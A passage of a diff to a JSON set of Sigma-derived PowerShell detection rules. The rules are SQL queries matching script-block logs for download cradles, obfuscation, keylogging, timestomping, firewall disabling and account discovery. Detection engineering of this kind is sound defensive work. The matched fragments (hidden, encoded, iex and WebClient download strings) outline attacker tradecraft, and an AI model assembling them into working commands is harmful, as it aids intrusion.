ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", + "title": "Powershell File and Directory Discovery", + "id": "d23f2ba5-9da0-4463-8908-8ee47f614bb9", "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.\nAdversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors,\nincluding whether or not the adversary fully infects the target and/or attempts specific actions.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%ls%' ESCAPE '\\' OR ScriptBlockText LIKE '%get-childitem%' ESCAPE '\\' OR ScriptBlockText LIKE '%gci%' ESCAPE '\\') AND ScriptBlockText LIKE '%-recurse%' ESCAPE '\\')" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_file_and_directory_discovery.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -7233,361 +6777,380 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", - "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "status": "experimental", + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", "author": "frack113", - "tags": [ - "attack.discovery", - "attack.t1018" - ], "falsepositives": [ - "Unknown" + "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "Potential PowerShell Obfuscation Using Alias Cmdlets", + "id": "96cd126d-f970-49c4-848a-da3a09f55c55", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", + "attack.t1027", "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Set-Alias %' ESCAPE '\\' OR ScriptBlockText LIKE '%New-Alias %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_susp_set_alias.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_enable_psremoting.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.execution", + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Suspicious Win32_PnPEntity", + "id": "b26647de-4feb-4283-af6b-6117661283c5", + "status": "test", + "description": "Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Legitimate use" + "Admin script" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_PnPEntity%' ESCAPE '\\')" ], - "filename": "posh_ps_modify_group_policy_settings.yml" + "filename": "posh_ps_susp_win32_pnpentity.yml" }, { - "title": "Registry-Free Process Scope COR_PROFILER", - "id": "23590215-4702-4a70-8805-8dc9e58314a2", + "title": "Replace Desktop Wallpaper by Powershell", + "id": "c5ac6a1e-9407-45f5-a0ce-ca9a0806a287", "status": "test", - "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.\nThis may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper\n", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1574.012" + "attack.impact", + "attack.t1491.001" ], "falsepositives": [ - "Legitimate administrative script" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%$env:COR\\_ENABLE\\_PROFILING%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER%' ESCAPE '\\' AND ScriptBlockText LIKE '%$env:COR\\_PROFILER\\_PATH%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Get-ItemProperty%' ESCAPE '\\' AND ScriptBlockText LIKE '%Registry::%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKEY\\_CURRENT\\_USER\\\\Control Panel\\\\Desktop\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%WallPaper%' ESCAPE '\\') OR ScriptBlockText LIKE '%SystemParametersInfo(20,0,%,3)%' ESCAPE '\\'))" ], - "filename": "posh_ps_cor_profiler.yml" + "filename": "posh_ps_susp_wallpaper.yml" }, { - "title": "Powershell Timestomp", - "id": "c6438007-e081-42ce-9483-b067fbef33c3", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1070.006" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate admin script" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.CreationTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastWriteTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%.LastAccessTime =%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetCreationTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastAccessTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%[IO.File]::SetLastWriteTime%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_timestomp.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Suspicious Start-Process PassThru", - "id": "0718cd72-f316-4aa2-988f-838ea8533277", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", "status": "test", - "description": "Powershell use PassThru option to start in background", - "author": "frack113", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Legitimate user creation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-PassThru %' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_start_process.yml" + "filename": "posh_ps_create_local_user.yml" }, { - "title": "Powershell Trigger Profiles by Add_Content", - "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", - "status": "test", - "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", + "title": "Suspicious Get Local Groups Information - PowerShell", + "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "status": "experimental", + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1546.013" + "attack.discovery", + "attack.t1069.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-Content%' ESCAPE '\\' AND ScriptBlockText LIKE '%$profile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Value%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' OR ScriptBlockText LIKE '%\"\"%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" ], - "filename": "posh_ps_trigger_profiles.yml" + "filename": "posh_ps_susp_local_group_reco.yml" }, { - "title": "Suspicious PowerShell Mailbox SMTP Forward Rule", - "id": "15b7abbb-8b40-4d01-9ee2-b51994b1d474", + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects usage of the powerShell Set-Mailbox Cmdlet to set-up an SMTP forwarding rule.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.exfiltration" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage of the cmdlet to forward emails" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Mailbox %' ESCAPE '\\' AND ScriptBlockText LIKE '% -DeliverToMailboxAndForward %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ForwardingSmtpAddress %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_exchange_mailbox_smpt_forwarding_rule.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Disable Powershell Command History", - "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "title": "Suspicious PowerShell Get Current User", + "id": "4096a49c-7de4-4da0-a230-c66ccd56ea5a", "status": "experimental", - "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", - "author": "Ali Alwashali", + "description": "Detects the use of PowerShell to identify the current logged user.", + "author": "frack113", + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" + ], + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%[System.Environment]::UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%$env:UserName%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Security.Principal.WindowsIdentity]::GetCurrent()%' ESCAPE '\\'))" + ], + "filename": "posh_ps_susp_get_current_user.yml" + }, + { + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.003" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script that disables the command history" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": "posh_ps_disable_psreadline_command_history.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Suspicious Connection to Remote Account", - "id": "1883444f-084b-419b-ac62-e0d0c5b3693f", - "status": "test", - "description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts.\nWithout knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.exfiltration" ], 